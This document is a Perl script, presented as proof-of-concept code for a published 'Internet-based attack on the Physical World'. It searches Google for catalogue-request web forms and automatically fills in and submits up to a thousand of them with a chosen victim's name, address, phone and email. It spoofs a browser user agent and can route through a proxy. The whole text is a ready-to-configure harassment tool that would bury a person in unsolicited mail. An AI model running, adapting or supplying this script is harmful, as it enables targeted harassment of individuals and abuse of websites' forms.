#!usr/bin/perl # angola.pl # # 'Proof of concept' code for the attack described in 'Defending against # an Internet-based attack on the Physical World' by Byers, Rubin and # Kormann. # # Written in April 2003 by James Fell # james@kaleton.com # http://www.kaleton.com/infosec/ use LWP; use HTML::Form; use SOAP::Lite; use URI::Escape; ################################################################################# # Configuration code is here. This should be edited. # The target name and address go here $targetTitle = "Mr"; $targetName = "Joe Bloggs"; $targetFirstname = "Joe"; $targetSurname = "Bloggs"; $targetCompany = "Acme Inc"; $targetDepartment = "Senior Management"; $targetJobtitle = "Director"; $targetStreet = "7 Fake Road"; $targetTown = "Fakesville"; $targetCounty = "Lancashire"; $targetPostcode = "OL12 5OL"; $targetCountry = "United Kingdom"; $targetFulladdress = "7 Fake Road, Fakesville, Lancashire, OL12 5OL, United Kingdom"; $targetPhone = "01706 123 456"; $targetFax = "01706 123 457"; $targetEmail = "joebloggs\@fake.acme.com"; # Obtain a Google API key at http://www.google.com/apis/ $google_key = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'; # The search query to use on Google $query = 'request catalogue name address postcode'; # Set this to 1 for debug mode $debug = 1; # Pretend to be a web browser $spoofedUserAgent = 'Mozilla/4.0 (compatible; MSIE 5.22; Mac_PowerPC)'; # Set this to 1 to use a HTTP proxy $useproxy = 0; $proxy = 'http://proxy-ip:proxy-port/'; ################################################################################# # Nothing below here needs to be edited. # Function to run a query on Google sub google_search { my ($service, $key, $q, $start, $max, $filter) = @_; my ($restrict, $safe, $lr, $ie, $oe) = ('', 0, '', 'latin1', 'utf8'); my $response = $service->doGoogleSearch( $key, $q, $start, $max, $filter, $restrict, $safe, $lr, $ie, $oe); if ($service->call->fault) { $response->{'err'} = $service->call->faultstring; if ($response->{'err'} =~ /exceeded for key.*$/) { my $err_addendum = '
[Please provide your own key]'; $response->{'err'} =~ s/(?<=exceeded for key).*$/$err_addendum/; } } return $response; } # Function to get a list of URLs from Google sub get_urls { $maxresults = 10; $filter = 0; # load the Google service definition $service = SOAP::Lite->service("http://api.google.com/GoogleSearch.wsdl"); # Grab the first 1000 search results and stick them in an array for ($start=0; $start<=990; $start+=10) { $response = google_search($service, $google_key, $query, $start, $maxresults, $filter); $i=$start; for $result (@{$response->{'resultElements'}}) { $urls_array[$i] = $result->{'URL'}; $i++; } } return @urls_array; } # Function to fill in a web form sub fill_form { $form_url = $_[0]; $ua = new LWP::UserAgent; $ua->agent($spoofedUserAgent); $ua->timeout(10); if ($useproxy == 1) { $ua->proxy(http => $proxy); } $request = new HTTP::Request('GET', $form_url); $form_html = ($ua->request($request))->as_string(); $form = HTML::Form->parse($form_html, $form_url); if ($form ne undef) { for $formInput ($form->inputs) { if ($formInput->type eq "textarea") { if ($formInput->name =~ /address/i) { $form->value($formInput->name => $targetFulladdress); } } if ($formInput->type eq "password") { $form->value($formInput->name => "daiichi596"); } if ($formInput->type eq "option") { for $optionValue ($formInput->possible_values) { if (($formInput->name =~ /title/i) && ($optionValue eq $targetTitle)) { $form->value($formInput->name => $targetTitle); } elsif (($formInput->name =~ /country/i) && ($optionValue eq $targetCountry)) { $form->value($formInput->name => $targetCountry); } } } if (($formInput->type eq "checkbox") || ($formInput->type eq "radio")) { for $optionValue ($formInput->possible_values) { if ($optionValue eq 'Y') { $form->value($formInput->name => 'Y'); } elsif ($optionValue eq 'y') { $form->value($formInput->name => 'y'); } elsif ($optionValue eq '1') { $form->value($formInput->name => '1'); } elsif ($optionValue eq 'on') { $form->value($formInput->name => 'on'); } elsif ($optionValue eq 'Yes') { $form->value($formInput->name => 'Yes'); } elsif ($optionValue eq 'yes') { $form->value($formInput->name => 'yes'); } elsif ($optionValue eq 'YES') { $form->value($formInput->name => 'YES'); } elsif ($optionValue eq 'interested') { $form->value($formInput->name => 'interested'); } } } if ( ($formInput->type eq "text") || ($formInput->type eq "textarea") ) { $formInput = $formInput->name; if ($formInput =~ /firstname/i) { $form->value($formInput => $targetFirstname); } elsif ($formInput =~ /first_name/i) { $form->value($formInput => $targetFirstname); } elsif ($formInput =~ /forename/i) { $form->value($formInput => $targetFirstname); } elsif ($formInput =~ /surname/i) { $form->value($formInput => $targetSurname); } elsif ($formInput =~ /lastname/i) { $form->value($formInput => $targetSurname); } elsif ($formInput =~ /last_name/i) { $form->value($formInput => $targetSurname); } elsif ($formInput =~ /name/i) { $form->value($formInput => $targetName); } elsif ($formInput =~ /company/i) { $form->value($formInput => $targetCompany); } elsif ($formInput =~ /organisation/i) { $form->value($formInput => $targetCompany); } elsif ($formInput =~ /organization/i) { $form->value($formInput => $targetCompany); } elsif ($formInput =~ /department/i) { $form->value($formInput => $targetDepartment); } elsif ($formInput =~ /dept/i) { $form->value($formInput => $targetDepartment); } elsif ($formInput =~ /jobtitle/i) { $form->value($formInput => $targetJobtitle); } elsif ($formInput =~ /position/i) { $form->value($formInput => $targetJobtitle); } elsif ($formInput =~ /title/i) { $form->value($formInput => $targetTitle); } elsif ($formInput eq /address/i) { $form->value($formInput => $targetStreet); } elsif (($formInput =~ /addr/i) && ($formInput =~ "1")) { $form->value($formInput => $targetStreet); } elsif ($formInput =~ /street/i) { $form->value($formInput => $targetStreet); } elsif ($formInput =~ /road/i) { $form->value($formInput => $targetStreet); } elsif ($formInput =~ /house/i) { $form->value($formInput => $targetStreet); } elsif (($formInput =~ /addr/i) && ($formInput =~ "2")) { $form->value($formInput => $targetTown); } elsif ($formInput =~ /town/i) { $form->value($formInput => $targetTown); } elsif ($formInput =~ /suburb/i) { $form->value($formInput => $targetTown); } elsif ($formInput =~ /city/i) { $form->value($formInput => $targetTown); } elsif (($formInput =~ /addr/i) && ($formInput =~ "3")) { $form->value($formInput => $targetCounty); } elsif ($formInput =~ /county/i) { $form->value($formInput => $targetCounty); } elsif ($formInput =~ /state/i) { $form->value($formInput => $targetCounty); } elsif ($formInput =~ /province/i) { $form->value($formInput => $targetCounty); } elsif ($formInput =~ /postcode/i) { $form->value($formInput => $targetPostcode); } elsif ($formInput =~ /post_code/i) { $form->value($formInput => $targetPostcode); } elsif ($formInput =~ /zip/i) { $form->value($formInput => $targetPostcode); } elsif ($formInput =~ /country/i) { $form->value($formInput => $targetCountry); } elsif ($formInput =~ /phone/i) { $form->value($formInput => $targetPhone); } elsif ($formInput =~ /tel/i) { $form->value($formInput => $targetPhone); } elsif ($formInput =~ /fone/i) { $form->value($formInput => $targetPhone); } elsif ($formInput =~ /fax/i) { $form->value($formInput => $targetFax); } elsif ($formInput =~ /email/i) { $form->value($formInput => $targetEmail); } elsif ($formInput =~ /e-mail/i) { $form->value($formInput => $targetEmail); } elsif ($formInput =~ /subj/i) { $form->value($formInput => "information request"); } elsif ($formInput =~ /topic/i) { $form->value($formInput => "information request"); } elsif ($formInput =~ /message/i) { $form->value($formInput => "Please send me more information by post."); } elsif ($formInput =~ /body/i) { $form->value($formInput => "Please send me more information by post."); } elsif ($formInput =~ /comment/i) { $form->value($formInput => "Please send me more information by post."); } elsif ($formInput =~ /query/i) { $form->value($formInput => "Please send me more information by post."); } elsif ($formInput =~ /interests/i) { $form->value($formInput => "Please send me more information by post."); } elsif ($formInput =~ /enquiry/i) { $form->value($formInput => "Please send me more information by post."); } elsif ($formInput =~ /inquiry/i) { $form->value($formInput => "Please send me more information by post."); } } } print "\n"; print $form->dump; print "\n"; if ($debug != 1) { $ua->request($form->click); } } else { print "\n"; print "This web page doesn't contain a form\n"; print "\n"; } } # Get a big list of form URLs @result = get_urls(); # Fill them all in $form_count=0; for $result (@result) { $form_count++; print "Form URL : $result\n"; print "Form Number : $form_count\n"; fill_form($result); } # End of Script #################################################################################